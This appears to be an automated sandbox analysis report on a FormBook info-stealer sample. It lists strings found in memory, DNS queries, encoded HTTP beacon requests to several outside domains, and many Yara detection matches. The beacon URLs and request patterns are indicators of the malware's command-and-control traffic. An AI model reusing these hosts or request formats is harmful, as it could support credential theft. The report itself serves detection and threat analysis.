75 72 6c 28 22 68 74 74 70 3a 2f 2f 32 62 73 69 6e 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 62 6c 75 65 68 6f 73 74 2d 77 6f 72 64 70 72 65 73 73 2d 70 6c 75 67 69 6e 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 63 73 2d 62 6c 75 65 68 6f 73 74 2d 62 67 2e 6a 70 67 22 29 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 74 6f 70 20 72 69 67 68 74 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 09 09 09 7d 0a 0a 09 09 09 2a 20 7b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 09 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 69 6e 70 75 74 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 7d 0a 0a 09 09 09 3a 3a 2d

Source: cmmon32.exe, 00000009.00000002.638961270.00000000050D2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://2bsing.com/wp-content/plugins/bluehost-wordpress-plugin/images/icon-email.svg
Source: cmmon32.exe, 00000009.00000002.638961270.00000000050D2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://2bsing.com/wp-content/plugins/bluehost-wordpress-plugin/static/images/cs-bluehost-bg.jpg
Source: cmmon32.exe, 00000009.00000002.638961270.00000000050D2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://2bsing.com/wp-includes/js/jquery/jquery.js
Source: jwRbEDUUZC.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: jwRbEDUUZC.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: jwRbEDUUZC.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: jwRbEDUUZC.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: jwRbEDUUZC.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: jwRbEDUUZC.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: jwRbEDUUZC.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: jwRbEDUUZC.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: jwRbEDUUZC.exe	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: jwRbEDUUZC.exe	String found in binary or memory: http://s.symcd.com0_
Source: jwRbEDUUZC.exe	String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: jwRbEDUUZC.exe	String found in binary or memory: http://sw.symcd.com0
Source: jwRbEDUUZC.exe	String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: jwRbEDUUZC.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: cmmon32.exe, 00000009.00000002.638961270.00000000050D2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://2bsing.com/wp-admin/admin-ajax.php
Source: cmmon32.exe, 00000009.00000002.638961270.00000000050D2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://2bsing.com/wp-login.php
Source: cmmon32.exe, 00000009.00000002.638961270.00000000050D2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://bluehost.com/wordpress
Source: jwRbEDUUZC.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: jwRbEDUUZC.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: jwRbEDUUZC.exe	String found in binary or memory: https://d.symcb.com/rpa0)
Source: cmmon32.exe, 00000009.00000002.638961270.00000000050D2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: cmmon32.exe, 00000009.00000002.638961270.00000000050D2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://my.bluehost.com/
Source: jwRbEDUUZC.exe	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown

DNS traffic detected: queries for: www.doxofcolor.com

Source: global traffic	HTTP traffic detected: GET /ocgr/?5jm=e/0Hm5WsGCZ9WAWS3m2jnNPZVvv73W2kM2wAvSWCn4dVzulK8Hz4WN5jVud3g/JTENNsBng/cw==&q48d=SN6PFzMPJRoDS HTTP/1.1Host: www.wallacehills.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ocgr/?q48d=SN6PFzMPJRoDS&5jm=kiCgFP8+acxhLHZoy8gx31rwxGvurJ2lCG9zpi5owq94JNIuYWHK8T6MP/53pnYYpwC2n0A2jw== HTTP/1.1Host: www.attmleather.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ocgr/?5jm=sK8+WGPg2JRLe3fUQ4xa6L8WlFBJd5xCkWFiCNREvztrzLZiwMdrfToIj+s3oTo1GaSK+fkqdA==&q48d=SN6PFzMPJRoDS HTTP/1.1Host: www.nagpurmandarin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ocgr/?q48d=SN6PFzMPJRoDS&5jm=tBqLR1P96jAoGzhM/bfMxIqpBnF4XdPQw9HD3GmR5P6T0l65+iRjfJ8EGOisALaFWgEX56fYJg== HTTP/1.1Host: www.yonatec.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ocgr/?5jm=9V0bXTkkxKWxDgp6RJOks70x/YcJP31kraxWgvuUzaENE/wb1OUHkodtz4aPYkPCWgKnca4quw==&q48d=SN6PFzMPJRoDS HTTP/1.1Host: www.tubesing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.637234072.00000000047F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.458062573.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.371851439.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.635249504.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.419943976.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.371477540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.373668020.00000000035FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.458109413.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.444239022.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.637234072.00000000047F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.637234072.00000000047F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.458062573.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.458062573.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.371851439.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.371851439.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.635249504.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.635249504.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.419943976.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.419943976.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.371477540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.371477540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.373668020.00000000035FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.373668020.00000000035FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.458109413.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.458109413.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.444239022.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.444239022.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

.NET source code contains very large strings

Source: jwRbEDUUZC.exe, A/cc41a19a57151d70b970c451596c3ee14.cs	Long String: Length: 16731
Source: 0.2.jwRbEDUUZC.exe.30000.0.unpack, A/cc41a19a57151d70b970c451596c3ee14.cs	Long String: Length: 16731
Source: 0.0.jwRbEDUUZC.exe.30000.0.unpack, A/cc41a19a57151d70b970c451596c3ee14.cs	Long String: Length: 16731

Source: jwRbEDUUZC.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED

Source: 1.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.637234072.00000000047F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.637234072.00000000047F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.458062573.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.458062573.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.371851439.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000000.371851439.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.635249504.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.635249504.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.419943976.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.419943976.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.371477540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000000.371477540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.373668020.00000000035FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.373668020.00000000035FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.458109413.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.458109413.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.444239022.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.444239022.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Code function: 0_2_000352A9	0_2_000352A9
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Code function: 0_2_00A12078	0_2_00A12078
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Code function: 0_2_00A10958	0_2_00A10958
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Code function: 0_2_00A141AF	0_2_00A141AF
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Code function: 0_2_00A141C0	0_2_00A141C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0041C950	1_2_0041C950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_00408C6B	1_2_00408C6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_00408C70	1_2_00408C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_00402D90	1_2_00402D90
